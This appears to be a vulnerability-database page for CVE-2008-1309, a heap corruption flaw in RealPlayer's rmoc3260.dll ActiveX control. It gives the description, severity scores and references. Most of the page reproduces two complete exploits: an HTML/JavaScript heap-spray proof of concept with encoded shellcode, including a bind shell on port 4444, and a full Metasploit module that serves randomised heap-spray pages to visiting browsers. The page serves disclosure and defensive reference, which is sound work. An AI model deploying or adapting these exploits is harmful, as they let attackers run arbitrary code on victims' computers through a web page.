CVE-2008-1309 : Detail

CVE-2008-1309

96.86%V3
Network
2008-03-12
16h00 +00:00
2018-10-11
17h57 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

The RealAudioObjects.RealAudio ActiveX control in rmoc3260.dll in RealNetworks RealPlayer Enterprise, RealPlayer 10, RealPlayer 10.5 before build 6.0.12.1675, and RealPlayer 11 before 11.0.3 build 6.0.14.806 does not properly manage memory for the (1) Console or (2) Controls property, which allows remote attackers to execute arbitrary code or cause a denial of service (browser crash) via a series of assignments of long string values, which triggers an overwrite of freed heap memory.

CVE Informations

Related Weaknesses

CWE-ID Weakness Name Source
CWE-399 Category : Resource Management Errors
Weaknesses in this category are related to improper management of system resources.

Metrics

Metrics Score Severity CVSS Vector Source
V2 9.3 AV:N/AC:M/Au:N/C:C/I:C/A:C [email protected]

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 5332

Publication date : 2008-03-31 22h00 +00:00
Author : Elazar
EDB Verified : Yes

<!-- Real Player rmoc3260.dll ActiveX Control Remote Code Execution Exploit(Heap Corruption) written by e.b. Tested on Windows XP SP2(fully patched) English, IE6, rmoc3260.dll version 6.0.10.45 Thanks to h.d.m. and the Metasploit crew --> <html> <head> <title>Real Player rmoc3260.dll ActiveX Control Remote Code Execution Exploit</title> <script language="JavaScript" defer> function Check() { // win32_exec - EXITFUNC=seh CMD=c:\windows\system32\calc.exe Size=378 Encoder=Alpha2 http://metasploit.com var shellcode1 = unescape("%u03eb%ueb59%ue805%ufff8%uffff%u4949%u4949%u4949" + "%u4948%u4949%u4949%u4949%u4949%u4949%u5a51%u436a" + "%u3058%u3142%u4250%u6b41%u4142%u4253%u4232%u3241" + "%u4141%u4130%u5841%u3850%u4242%u4875%u6b69%u4d4c" + "%u6338%u7574%u3350%u6730%u4c70%u734b%u5775%u6e4c" + "%u636b%u454c%u6355%u3348%u5831%u6c6f%u704b%u774f" + "%u6e68%u736b%u716f%u6530%u6a51%u724b%u4e69%u366b" + "%u4e54%u456b%u4a51%u464e%u6b51%u4f70%u4c69%u6e6c" + "%u5964%u7350%u5344%u5837%u7a41%u546a%u334d%u7831" + "%u4842%u7a6b%u7754%u524b%u6674%u3444%u6244%u5955" + "%u6e75%u416b%u364f%u4544%u6a51%u534b%u4c56%u464b" + "%u726c%u4c6b%u534b%u376f%u636c%u6a31%u4e4b%u756b" + "%u6c4c%u544b%u4841%u4d6b%u5159%u514c%u3434%u4a44" + "%u3063%u6f31%u6230%u4e44%u716b%u5450%u4b70%u6b35" + "%u5070%u4678%u6c6c%u634b%u4470%u4c4c%u444b%u3530" + "%u6e4c%u6c4d%u614b%u5578%u6a58%u644b%u4e49%u6b6b" + "%u6c30%u5770%u5770%u4770%u4c70%u704b%u4768%u714c" + "%u444f%u6b71%u3346%u6650%u4f36%u4c79%u6e38%u4f63" + "%u7130%u306b%u4150%u5878%u6c70%u534a%u5134%u334f" + "%u4e58%u3978%u6d6e%u465a%u616e%u4b47%u694f%u6377" + "%u4553%u336a%u726c%u3057%u5069%u626e%u7044%u736f" + "%u4147%u4163%u504c%u4273%u3159%u5063%u6574%u7035" + "%u546d%u6573%u3362%u306c%u4163%u7071%u536c%u6653" + "%u314e%u7475%u7038%u7765%u4370"); // win32_bind - EXITFUNC=seh LPORT=4444 Size=696 Encoder=Alpha2 http://metasploit.com var shellcode2 = unescape("%u03eb%ueb59%ue805%ufff8%uffff%u4949%u4949%u4949" + "%u4949%u4949%u4949%u4949%u4949%u4937%u5a51%u436a" + "%u3058%u3142%u4150%u6b42%u4141%u4153%u4132%u3241" + "%u4142%u4230%u5841%u3850%u4241%u7875%u4b69%u724c" + "%u584a%u526b%u4a6d%u4a48%u6b59%u6b4f%u694f%u416f" + "%u4e70%u526b%u744c%u4164%u6e34%u376b%u5535%u4c6c" + "%u714b%u646c%u6145%u7468%u6a41%u6e4f%u626b%u326f" + "%u6c38%u334b%u376f%u5550%u7851%u316b%u6c59%u504b" + "%u6e34%u466b%u6861%u456e%u6f61%u6c30%u6c59%u6b6c" + "%u3934%u4150%u3764%u6877%u6941%u565a%u636d%u4b31" + "%u7872%u6c6b%u7534%u566b%u3134%u5734%u5458%u6b35" + "%u6e55%u336b%u556f%u7474%u7841%u416b%u4c76%u464b" + "%u626c%u6e6b%u416b%u354f%u564c%u6861%u666b%u3663" + "%u6c4c%u6b4b%u7239%u444c%u5764%u616c%u4f71%u4733" + "%u6b41%u336b%u4c54%u634b%u7073%u6c30%u534b%u6470" + "%u6c4c%u724b%u4550%u4e4c%u6c4d%u374b%u7530%u7358" + "%u426e%u4c48%u524e%u466e%u586e%u566c%u3930%u586f" + "%u7156%u4676%u7233%u6346%u3058%u7033%u3332%u5458" + "%u5237%u4553%u5162%u504f%u4b54%u5a4f%u3370%u6a58" + "%u686b%u596d%u456c%u466b%u4930%u596f%u7346%u4e6f" + "%u5869%u7365%u4d56%u5851%u366d%u6468%u7242%u7275" + "%u674a%u5972%u6e6f%u7230%u4a48%u5679%u6b69%u6e45" + "%u764d%u6b37%u584f%u3356%u3063%u5053%u7653%u7033" + "%u3353%u5373%u3763%u5633%u6b33%u5a4f%u3270%u5046" + "%u3568%u7141%u304c%u3366%u6c63%u6d49%u6a31%u7035" + "%u6e68%u3544%u524a%u4b50%u7177%u4b47%u4e4f%u3036" + "%u526a%u3130%u7041%u5955%u6e6f%u3030%u6c68%u4c64" + "%u546d%u796e%u3179%u5947%u596f%u4646%u6633%u6b35" + "%u584f%u6350%u4b58%u7355%u4c79%u4146%u6359%u4b67" + "%u784f%u7656%u5330%u4164%u3344%u7965%u4e6f%u4e30" + "%u7173%u5878%u6167%u6969%u7156%u6269%u3977%u6a6f" + "%u5176%u4945%u4e6f%u5130%u5376%u715a%u7274%u6246" + "%u3048%u3063%u6c6d%u5a49%u6345%u625a%u7670%u3139" + "%u5839%u4e4c%u4d69%u5337%u335a%u4e74%u4b69%u5652" + "%u4b51%u6c70%u6f33%u495a%u336e%u4472%u6b6d%u374e" + "%u7632%u6e4c%u6c73%u704d%u767a%u6c58%u4e6b%u4c4b" + "%u736b%u5358%u7942%u6d6e%u7463%u6b56%u304f%u7075" + "%u4b44%u794f%u5346%u706b%u7057%u7152%u5041%u4251" + "%u4171%u337a%u4231%u4171%u5141%u6645%u6931%u5a6f" + "%u5070%u6e68%u5a4d%u5679%u6865%u334e%u3963%u586f" + "%u6356%u4b5a%u4b4f%u704f%u4b37%u4a4f%u4c70%u614b" + "%u6b47%u4d4c%u6b53%u3174%u4974%u596f%u7046%u5952" + "%u4e6f%u6330%u6c58%u6f30%u577a%u6174%u324f%u4b73" + "%u684f%u3956%u386f%u4350"); var bigblock = unescape("%u0C0C%u0C0C"); var headersize = 20; var slackspace = headersize + shellcode1.length; while (bigblock.length < slackspace) bigblock += bigblock; var fillblock = bigblock.substring(0,slackspace); var block = bigblock.substring(0,bigblock.length - slackspace); while (block.length + slackspace < 0x40000) block = block + block + fillblock; var memory = new Array(); for (i = 0; i < 400; i++){ memory[i] = block + shellcode1 } var buf = ''; while (buf.length < 32) buf = buf + unescape("%0C"); var m = ''; m = obj.Console; obj.Console = buf; obj.Console = m; m = obj.Console; obj.Console = buf; obj.Console = m; } </script> </head> <body onload="JavaScript: return Check();"> <object classid="clsid:2F542A2E-EDC9-4BF7-8CB1-87C9919F7F93" id="obj"> Unable to create object </object> </body> </html> # milw0rm.com [2008-04-01]
Exploit Database EDB-ID : 16584

Publication date : 2010-06-14 22h00 +00:00
Author : Metasploit
EDB Verified : Yes

## # $Id: realplayer_console.rb 9525 2010-06-15 07:18:08Z jduck $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML def initialize(info = {}) super(update_info(info, 'Name' => 'RealPlayer rmoc3260.dll ActiveX Control Heap Corruption', 'Description' => %q{ This module exploits a heap corruption vulnerability in the RealPlayer ActiveX control. By sending a specially crafted string to the 'Console' property in the rmoc3260.dll control, an attacker may be able to execute arbitrary code. }, 'License' => MSF_LICENSE, 'Author' => [ 'Elazar Broad <elazarb[at]earthlink.net>' ], 'Version' => '$Revision: 9525 $', 'References' => [ [ 'CVE', '2008-1309' ], [ 'OSVDB', '42946' ], [ 'BID', '28157' ], [ 'URL', 'http://secunia.com/advisories/29315/' ], ], 'DefaultOptions' => { 'EXITFUNC' => 'process', }, 'Payload' => { 'Space' => 1024, 'BadChars' => "\x00\x09\x0a\x0d'\\", 'StackAdjustment' => -3500, }, 'Platform' => 'win', 'Targets' => [ [ 'Windows XP SP0-SP3 / IE 6.0 SP0-2 & IE 7.0 English', { 'Offset' => 32, 'Ret' => 0x0C0C0C0C } ] ], 'DisclosureDate' => 'Mar 8 2008', 'DefaultTarget' => 0)) end def autofilter false end def check_dependencies use_zlib end def on_request_uri(cli, request) # Re-generate the payload return if ((p = regenerate_payload(cli)) == nil) # Encode the shellcode shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch)) # Setup exploit buffers nops = Rex::Text.to_unescape([target.ret].pack('V')) ret = Rex::Text.uri_encode([target.ret].pack('L')) blocksize = 0x40000 fillto = 400 offset = target['Offset'] # Randomize the javascript variable names racontrol = rand_text_alpha(rand(100) + 1) j_shellcode = rand_text_alpha(rand(100) + 1) j_nops = rand_text_alpha(rand(100) + 1) j_headersize = rand_text_alpha(rand(100) + 1) j_slackspace = rand_text_alpha(rand(100) + 1) j_fillblock = rand_text_alpha(rand(100) + 1) j_block = rand_text_alpha(rand(100) + 1) j_memory = rand_text_alpha(rand(100) + 1) j_counter = rand_text_alpha(rand(30) + 2) j_ret = rand_text_alpha(rand(100) + 1) # Build out the message content = %Q|<html> <object classid='clsid:2F542A2E-EDC9-4BF7-8CB1-87C9919F7F93' id='#{racontrol}'></object> <script language='javascript'> #{j_shellcode} = unescape('#{shellcode}'); #{j_nops} = unescape('#{nops}'); #{j_headersize} = 20; #{j_slackspace} = #{j_headersize} + #{j_shellcode}.length while (#{j_nops}.length < #{j_slackspace}) #{j_nops} += #{j_nops}; #{j_fillblock} = #{j_nops}.substring(0, #{j_slackspace}); #{j_block} = #{j_nops}.substring(0, #{j_nops}.length - #{j_slackspace}); while(#{j_block}.length + #{j_slackspace} < #{blocksize}) #{j_block} = #{j_block} + #{j_block} + #{j_fillblock}; #{j_memory} = new Array(); for (#{j_counter} = 0; #{j_counter} < #{fillto}; #{j_counter}++) #{j_memory}[#{j_counter}] = #{j_block} + #{j_shellcode}; #{j_ret} = unescape('#{ret}'); while (#{j_ret}.length < #{offset}) #{j_ret} += #{j_ret}; #{racontrol}.Console = #{j_ret}; #{racontrol}.Console = ''; #{racontrol}.Console = #{j_ret}; </script> </html> | print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...") # Transmit the response to the client send_response_html(cli, content) # Handle the payload handler(cli) end end

Products Mentioned

Configuraton 0

Realnetworks>>Realplayer >> Version *

Realnetworks>>Realplayer >> Version 10.0

Realnetworks>>Realplayer >> Version 10.5

Realnetworks>>Realplayer >> Version 11

    References

    http://secunia.com/advisories/29315
    Tags : third-party-advisory, x_refsource_SECUNIA
    http://www.securitytracker.com/id?1019576
    Tags : vdb-entry, x_refsource_SECTRACK
    https://www.exploit-db.com/exploits/5332
    Tags : exploit, x_refsource_EXPLOIT-DB
    http://www.vupen.com/english/advisories/2008/0842
    Tags : vdb-entry, x_refsource_VUPEN
    http://www.kb.cert.org/vuls/id/831457
    Tags : third-party-advisory, x_refsource_CERT-VN
    http://www.securitytracker.com/id?1020563
    Tags : vdb-entry, x_refsource_SECTRACK
    http://www.securityfocus.com/bid/28157
    Tags : vdb-entry, x_refsource_BID